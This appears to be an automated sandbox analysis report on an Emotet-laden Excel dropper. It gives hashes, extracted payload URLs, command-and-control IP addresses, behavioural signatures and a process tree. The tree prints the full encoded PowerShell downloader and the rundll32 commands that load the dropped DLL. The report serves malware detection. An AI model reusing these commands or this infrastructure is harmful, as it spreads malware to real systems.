Analysis
-
max time kernel
134s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20221111-en -
resource tags
arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system -
submitted
25-01-2023 08:09
Behavioral task
behavioral1
Sample
8137ec71fc0aeab0be48d885d1334de3.xls
Resource
win7-20220812-en
General
-
Target
8137ec71fc0aeab0be48d885d1334de3.xls
-
Size
121KB
-
MD5
8137ec71fc0aeab0be48d885d1334de3
-
SHA1
e88e7cb7c1d78aecf48b226d1c8e4c1089ed7204
-
SHA256
b270f1dc0e9a1979ad04d277031b351fd46e4edcc244404db32226259f89ccb2
-
SHA512
bd9247f2c2cc45a9f9eedbc8ba499f615d19ee30c0f76748e12135426522251b089fb4b7758fad45c5880e9cd87c67a8b0bc221ec41db59862735cdfb8c80e5f
-
SSDEEP
3072:ucKoSsxzNDZLDZjlbR868O8KlVH37kehvMqAPjxO5xyZUE5V5xtezEVg8/dgcBFl:ucKoSsxzNDZLDZjlbR868O8KlVH37keI
Malware Config
Extracted
https://youlanda.org/eln-images/n8DPZISf/
http://rosevideo.net/eln-images/EjdCoMlY8Gy/
http://vbaint.com/eln-images/H2pPGte8XzENC/
https://framemakers.us/eln-images/U5W2IGE9m8i9h9r/
http://niplaw.com/asolidfoundation/yCE9/
http://robertmchilespe.com/cgi/3f/
http://vocoptions.net/cgi/ifM9R5ylbVpM8hfR/
http://missionnyc.org/fonts/JO5/
http://robertflood.us/eln-images/DGI2YOkSc99XPO/
http://mpmcomputing.com/fonts/fJJrjqpIY3Bt3Q/
http://dadsgetinthegame.com/eln-images/tAAUG/
http://smbservices.net/cgi/JO01ckuwd/
http://stkpointers.com/eln-images/D/
http://rosewoodcraft.com/Merchant2/5.00/PGqX/
Extracted
emotet
Epoch4
185.248.140.40:443
8.9.11.48:443
200.17.134.35:7080
207.38.84.195:8080
79.172.212.216:8080
45.176.232.124:443
45.118.135.203:7080
162.243.175.63:443
110.232.117.186:8080
103.75.201.4:443
195.154.133.20:443
160.16.102.168:80
164.68.99.3:8080
131.100.24.231:80
216.158.226.206:443
159.89.230.105:443
178.79.147.66:8080
178.128.83.165:80
212.237.5.209:443
82.165.152.127:8080
50.116.54.215:443
58.227.42.236:80
119.235.255.201:8080
144.76.186.49:8080
138.185.72.26:8080
162.214.50.39:7080
81.0.236.90:443
176.104.106.96:8080
144.76.186.55:7080
129.232.188.93:443
212.24.98.99:8080
203.114.109.124:443
103.75.201.2:443
173.212.193.249:8080
41.76.108.46:8080
45.118.115.99:8080
158.69.222.101:443
107.182.225.142:8080
212.237.17.99:8080
212.237.56.116:7080
159.8.59.82:8080
46.55.222.11:443
104.251.214.46:8080
31.24.158.56:8080
153.126.203.229:8080
51.254.140.238:7080
185.157.82.211:8080
217.182.143.207:443
45.142.114.231:8080
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
wscript.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 388 4972 wscript.exe EXCEL.EXE -
Blocklisted process makes network request 13 IoCs
Processes:
powershell.exerundll32.exeflow pid process 38 5088 powershell.exe 58 5088 powershell.exe 60 5088 powershell.exe 62 5088 powershell.exe 64 5088 powershell.exe 66 5088 powershell.exe 70 1908 rundll32.exe 78 1908 rundll32.exe 82 1908 rundll32.exe 85 1908 rundll32.exe 86 1908 rundll32.exe 87 1908 rundll32.exe 88 1908 rundll32.exe -
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
wscript.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Control Panel\International\Geo\Nation wscript.exe -
Loads dropped DLL 4 IoCs
Processes:
rundll32.exerundll32.exerundll32.exerundll32.exepid process 5032 rundll32.exe 4752 rundll32.exe 764 rundll32.exe 1908 rundll32.exe -
Drops file in System32 directory 1 IoCs
Processes:
rundll32.exedescription ioc process File opened for modification C:\Windows\SysWOW64\Kidkmwuyqaydrqwt\ziwzsspywbsiz.gef rundll32.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
EXCEL.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
EXCEL.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
EXCEL.EXEpid process 4972 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
powershell.exerundll32.exepid process 5088 powershell.exe 5088 powershell.exe 1908 rundll32.exe 1908 rundll32.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 5088 powershell.exe -
Suspicious use of SetWindowsHookEx 12 IoCs
Processes:
EXCEL.EXEpid process 4972 EXCEL.EXE 4972 EXCEL.EXE 4972 EXCEL.EXE 4972 EXCEL.EXE 4972 EXCEL.EXE 4972 EXCEL.EXE 4972 EXCEL.EXE 4972 EXCEL.EXE 4972 EXCEL.EXE 4972 EXCEL.EXE 4972 EXCEL.EXE 4972 EXCEL.EXE -
Suspicious use of WriteProcessMemory 20 IoCs
Processes:
EXCEL.EXEwscript.execmd.execmd.exerundll32.exerundll32.exerundll32.exedescription pid process target process PID 4972 wrote to memory of 388 4972 EXCEL.EXE wscript.exe PID 4972 wrote to memory of 388 4972 EXCEL.EXE wscript.exe PID 388 wrote to memory of 2044 388 wscript.exe cmd.exe PID 388 wrote to memory of 2044 388 wscript.exe cmd.exe PID 2044 wrote to memory of 5088 2044 cmd.exe powershell.exe PID 2044 wrote to memory of 5088 2044 cmd.exe powershell.exe PID 388 wrote to memory of 1020 388 wscript.exe cmd.exe PID 388 wrote to memory of 1020 388 wscript.exe cmd.exe PID 1020 wrote to memory of 5032 1020 cmd.exe rundll32.exe PID 1020 wrote to memory of 5032 1020 cmd.exe rundll32.exe PID 1020 wrote to memory of 5032 1020 cmd.exe rundll32.exe PID 5032 wrote to memory of 4752 5032 rundll32.exe rundll32.exe PID 5032 wrote to memory of 4752 5032 rundll32.exe rundll32.exe PID 5032 wrote to memory of 4752 5032 rundll32.exe rundll32.exe PID 4752 wrote to memory of 764 4752 rundll32.exe rundll32.exe PID 4752 wrote to memory of 764 4752 rundll32.exe rundll32.exe PID 4752 wrote to memory of 764 4752 rundll32.exe rundll32.exe PID 764 wrote to memory of 1908 764 rundll32.exe rundll32.exe PID 764 wrote to memory of 1908 764 rundll32.exe rundll32.exe PID 764 wrote to memory of 1908 764 rundll32.exe rundll32.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\8137ec71fc0aeab0be48d885d1334de3.xls"1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SYSTEM32\wscript.exewscript c:\programdata\tjspowj.vbs2⤵
- Process spawned unexpected child process
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\programdata\uidpjewl.bat" "3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -enc JABNAEoAWABkAGYAcwBoAEQAcgBmAEcAWgBzAGUAcwA0AD0AIgBoAHQAdABwAHMAOgAvAC8AeQBvAHUAbABhAG4AZABhAC4AbwByAGcALwBlAGwAbgAtAGkAbQBhAGcAZQBzAC8AbgA4AEQAUABaAEkAUwBmAC8ALABoAHQAdABwADoALwAvAHIAbwBzAGUAdgBpAGQAZQBvAC4AbgBlAHQALwBlAGwAbgAtAGkAbQBhAGcAZQBzAC8ARQBqAGQAQwBvAE0AbABZADgARwB5AC8ALABoAHQAdABwADoALwAvAHYAYgBhAGkAbgB0AC4AYwBvAG0ALwBlAGwAbgAtAGkAbQBhAGcAZQBzAC8ASAAyAHAAUABHAHQAZQA4AFgAegBFAE4AQwAvACwAaAB0AHQAcABzADoALwAvAGYAcgBhAG0AZQBtAGEAawBlAHIAcwAuAHUAcwAvAGUAbABuAC0AaQBtAGEAZwBlAHMALwBVADUAVwAyAEkARwBFADkAbQA4AGkAOQBoADkAcgAvACwAaAB0AHQAcAA6AC8ALwBuAGkAcABsAGEAdwAuAGMAbwBtAC8AYQBzAG8AbABpAGQAZgBvAHUAbgBkAGEAdABpAG8AbgAvAHkAQwBFADkALwAsAGgAdAB0AHAAOgAvAC8AcgBvAGIAZQByAHQAbQBjAGgAaQBsAGUAcwBwAGUALgBjAG8AbQAvAGMAZwBpAC8AMwBmAC8ALABoAHQAdABwADoALwAvAHYAbwBjAG8AcAB0AGkAbwBuAHMALgBuAGUAdAAvAGMAZwBpAC8AaQBmAE0AOQBSADUAeQBsAGIAVgBwAE0AOABoAGYAUgAvACwAaAB0AHQAcAA6AC8ALwBtAGkAcwBzAGkAbwBuAG4AeQBjAC4AbwByAGcALwBmAG8AbgB0AHMALwBKAE8ANQAvACwAaAB0AHQAcAA6AC8ALwByAG8AYgBlAHIAdABmAGwAbwBvAGQALgB1AHMALwBlAGwAbgAtAGkAbQBhAGcAZQBzAC8ARABHAEkAMgBZAE8AawBTAGMAOQA5AFgAUABPAC8ALABoAHQAdABwADoALwAvAG0AcABtAGMAbwBtAHAAdQB0AGkAbgBnAC4AYwBvAG0ALwBmAG8AbgB0AHMALwBmAEoASgByAGoAcQBwAEkAWQAzAEIAdAAzAFEALwAsAGgAdAB0AHAAOgAvAC8AZABhAGQAcwBnAGUAdABpAG4AdABoAGUAZwBhAG0AZQAuAGMAbwBtAC8AZQBsAG4ALQBpAG0AYQBnAGUAcwAvAHQAQQBBAFUARwAvACwAaAB0AHQAcAA6AC8ALwBzAG0AYgBzAGUAcgB2AGkAYwBlAHMALgBuAGUAdAAvAGMAZwBpAC8ASgBPADAAMQBjAGsAdQB3AGQALwAsAGgAdAB0AHAAOgAvAC8AcwB0AGsAcABvAGkAbgB0AGUAcgBzAC4AYwBvAG0ALwBlAGwAbgAtAGkAbQBhAGcAZQBzAC8ARAAvACwAaAB0AHQAcAA6AC8ALwByAG8AcwBlAHcAbwBvAGQAYwByAGEAZgB0AC4AYwBvAG0ALwBNAGUAcgBjAGgAYQBuAHQAMgAvADUALgAwADAALwBQAEcAcQBYAC8AIgAuAHMAUABMAEkAdAAoACIALAAiACkAOwAgAGYAbwBSAGUAQQBDAGgAKAAkAHkASQBkAHMAUgBoAHkAZQAzADQAcwB5AHUAZgBnAHgAagBjAGQAZgAgAGkATgAgACQATQBKAFgAZABmAHMAaABEAHIAZgBHAFoAcwBlAHMANAApAHsAIAAkAEcAdwBlAFkASAA1ADcAcwBlAGQAcwB3AGQAPQAoACIAYwBpAHUAdwBkADoAaQB1AHcAZABcAHAAcgBpAHUAdwBkAG8AZwBpAHUAdwBkAHIAYQBtAGkAdQB3AGQAZABhAHQAaQB1AHcAZABhAFwAcAB1AGkAaABvAHUAZAAuAGQAaQB1AHcAZABsAGkAdQB3AGQAbAAiACkALgByAGUAUABsAEEAQwBlACgAIgBpAHUAdwBkACIALAAiACIAKQA7AGkAbgBWAE8AawBlAC0AdwBlAEIAcgBFAHEAVQBlAHMAVAAgAC0AdQBSAEkAIAAkAHkASQBkAHMAUgBoAHkAZQAzADQAcwB5AHUAZgBnAHgAagBjAGQAZgAgAC0AbwBVAHQARgBJAGwAZQAgACQARwB3AGUAWQBIADUANwBzAGUAZABzAHcAZAA7AGkARgAoAHQAZQBTAHQALQBwAEEAVABoACAAJABHAHcAZQBZAEgANQA3AHMAZQBkAHMAdwBkACkAewBpAGYAKAAoAGcARQB0AC0AaQB0AEUAbQAgACQARwB3AGUAWQBIADUANwBzAGUAZABzAHcAZAApAC4AbABlAE4ARwB0AGgAIAAtAGcAZQAgADQANwA0ADMANgApAHsAYgBSAGUAYQBrADsAfQB9AH0A4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c start /B c:\windows\syswow64\rundll32.exe c:\programdata\puihoud.dll,tjpleowdsyf3⤵
- Suspicious use of WriteProcessMemory
-
\??\c:\windows\syswow64\rundll32.exec:\windows\syswow64\rundll32.exe c:\programdata\puihoud.dll,tjpleowdsyf4⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\SysWOW64\rundll32.exe "c:\programdata\puihoud.dll",DllRegisterServer5⤵
- Loads dropped DLL
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Kidkmwuyqaydrqwt\ziwzsspywbsiz.gef",kXCEFoePMAvs6⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Kidkmwuyqaydrqwt\ziwzsspywbsiz.gef",DllRegisterServer7⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\ProgramData\puihoud.dllFilesize
412KB
MD577eeb66f96fd8dd8e98c26f061ba7a8b
SHA18f3384b4015ccdf4f89baabd615e8660ecb51b82
SHA25618e3b0d902f95fb74affd0f0e203b5a7d6d8a9aa17967611b17377008b5f0c52
SHA512315be0f546c45214da53e238b4b6a9f4c930ef1be9f3a4ff71002afda091fe533275c2f4f8c403ffc1b8e73ec076c2465ad14c7e9df3707536d46089b9940ef6
-
C:\ProgramData\puihoud.dllFilesize
412KB
MD577eeb66f96fd8dd8e98c26f061ba7a8b
SHA18f3384b4015ccdf4f89baabd615e8660ecb51b82
SHA25618e3b0d902f95fb74affd0f0e203b5a7d6d8a9aa17967611b17377008b5f0c52
SHA512315be0f546c45214da53e238b4b6a9f4c930ef1be9f3a4ff71002afda091fe533275c2f4f8c403ffc1b8e73ec076c2465ad14c7e9df3707536d46089b9940ef6
-
C:\Windows\SysWOW64\Kidkmwuyqaydrqwt\ziwzsspywbsiz.gefFilesize
412KB
MD577eeb66f96fd8dd8e98c26f061ba7a8b
SHA18f3384b4015ccdf4f89baabd615e8660ecb51b82
SHA25618e3b0d902f95fb74affd0f0e203b5a7d6d8a9aa17967611b17377008b5f0c52
SHA512315be0f546c45214da53e238b4b6a9f4c930ef1be9f3a4ff71002afda091fe533275c2f4f8c403ffc1b8e73ec076c2465ad14c7e9df3707536d46089b9940ef6
-
C:\Windows\SysWOW64\Kidkmwuyqaydrqwt\ziwzsspywbsiz.gefFilesize
412KB
MD577eeb66f96fd8dd8e98c26f061ba7a8b
SHA18f3384b4015ccdf4f89baabd615e8660ecb51b82
SHA25618e3b0d902f95fb74affd0f0e203b5a7d6d8a9aa17967611b17377008b5f0c52
SHA512315be0f546c45214da53e238b4b6a9f4c930ef1be9f3a4ff71002afda091fe533275c2f4f8c403ffc1b8e73ec076c2465ad14c7e9df3707536d46089b9940ef6
-
C:\programdata\uidpjewl.batFilesize
3KB
MD56af598c95c689c2be476d63c499354db
SHA16affcd3ef00724c2ce144950d79a6195ce72c06e
SHA2567a899fe4ad1682d78e178b77e3e1eb7c5a5d30c84482e8f5c8d2ae078e983029
SHA5123c2d0dc7cc0281cf9553bc3442b7a47b3cd7ab723b201441056c1a87094b8f11aa79a0728b0d60e3279fab97d809cf237802e839a3079f6ca67df468e06e9b70
-
\??\c:\programdata\puihoud.dllFilesize
412KB
MD577eeb66f96fd8dd8e98c26f061ba7a8b
SHA18f3384b4015ccdf4f89baabd615e8660ecb51b82
SHA25618e3b0d902f95fb74affd0f0e203b5a7d6d8a9aa17967611b17377008b5f0c52
SHA512315be0f546c45214da53e238b4b6a9f4c930ef1be9f3a4ff71002afda091fe533275c2f4f8c403ffc1b8e73ec076c2465ad14c7e9df3707536d46089b9940ef6
-
\??\c:\programdata\tjspowj.vbsFilesize
689B
MD524a3cd3164d4db5a47b7a321aa51b0c6
SHA1eb7277f82001af340b6404300465629b19811c3a
SHA2565eed2cdac8033b25525f9240c83f793f12e606451298bb314ab4b40af62f08a2
SHA5123ed236cd1bfa2283eec0443dcabd602fc100a2b4c38b60aa9ab99d769dc61f115032686b5572db16e98b9ecb44a94053eb9f0a9b46e94a854217311d0076c8e2
-
memory/388-139-0x0000000000000000-mapping.dmp
-
memory/764-162-0x0000000000000000-mapping.dmp
-
memory/764-164-0x00000000012C0000-0x00000000012E8000-memory.dmpFilesize
160KB
-
memory/1020-150-0x0000000000000000-mapping.dmp
-
memory/1908-169-0x0000000002AD0000-0x0000000002AF8000-memory.dmpFilesize
160KB
-
memory/1908-167-0x0000000000000000-mapping.dmp
-
memory/2044-143-0x0000000000000000-mapping.dmp
-
memory/4752-159-0x0000000000F30000-0x0000000000F58000-memory.dmpFilesize
160KB
-
memory/4752-157-0x0000000000000000-mapping.dmp
-
memory/4972-141-0x000001F735440000-0x000001F735444000-memory.dmpFilesize
16KB
-
memory/4972-133-0x00007FF97CD10000-0x00007FF97CD20000-memory.dmpFilesize
64KB
-
memory/4972-173-0x00007FF97CD10000-0x00007FF97CD20000-memory.dmpFilesize
64KB
-
memory/4972-137-0x00007FF97AC00000-0x00007FF97AC10000-memory.dmpFilesize
64KB
-
memory/4972-174-0x00007FF97CD10000-0x00007FF97CD20000-memory.dmpFilesize
64KB
-
memory/4972-136-0x00007FF97CD10000-0x00007FF97CD20000-memory.dmpFilesize
64KB
-
memory/4972-175-0x00007FF97CD10000-0x00007FF97CD20000-memory.dmpFilesize
64KB
-
memory/4972-176-0x00007FF97CD10000-0x00007FF97CD20000-memory.dmpFilesize
64KB
-
memory/4972-135-0x00007FF97CD10000-0x00007FF97CD20000-memory.dmpFilesize
64KB
-
memory/4972-132-0x00007FF97CD10000-0x00007FF97CD20000-memory.dmpFilesize
64KB
-
memory/4972-138-0x00007FF97AC00000-0x00007FF97AC10000-memory.dmpFilesize
64KB
-
memory/4972-134-0x00007FF97CD10000-0x00007FF97CD20000-memory.dmpFilesize
64KB
-
memory/5032-151-0x0000000000000000-mapping.dmp
-
memory/5032-154-0x0000000002720000-0x0000000002748000-memory.dmpFilesize
160KB
-
memory/5088-149-0x00007FF993610000-0x00007FF9940D1000-memory.dmpFilesize
10.8MB
-
memory/5088-148-0x0000021DEEDD0000-0x0000021DEF576000-memory.dmpFilesize
7.6MB
-
memory/5088-147-0x00007FF993610000-0x00007FF9940D1000-memory.dmpFilesize
10.8MB
-
memory/5088-146-0x00007FF993610000-0x00007FF9940D1000-memory.dmpFilesize
10.8MB
-
memory/5088-145-0x0000021DEDFD0000-0x0000021DEDFF2000-memory.dmpFilesize
136KB
-
memory/5088-144-0x0000000000000000-mapping.dmp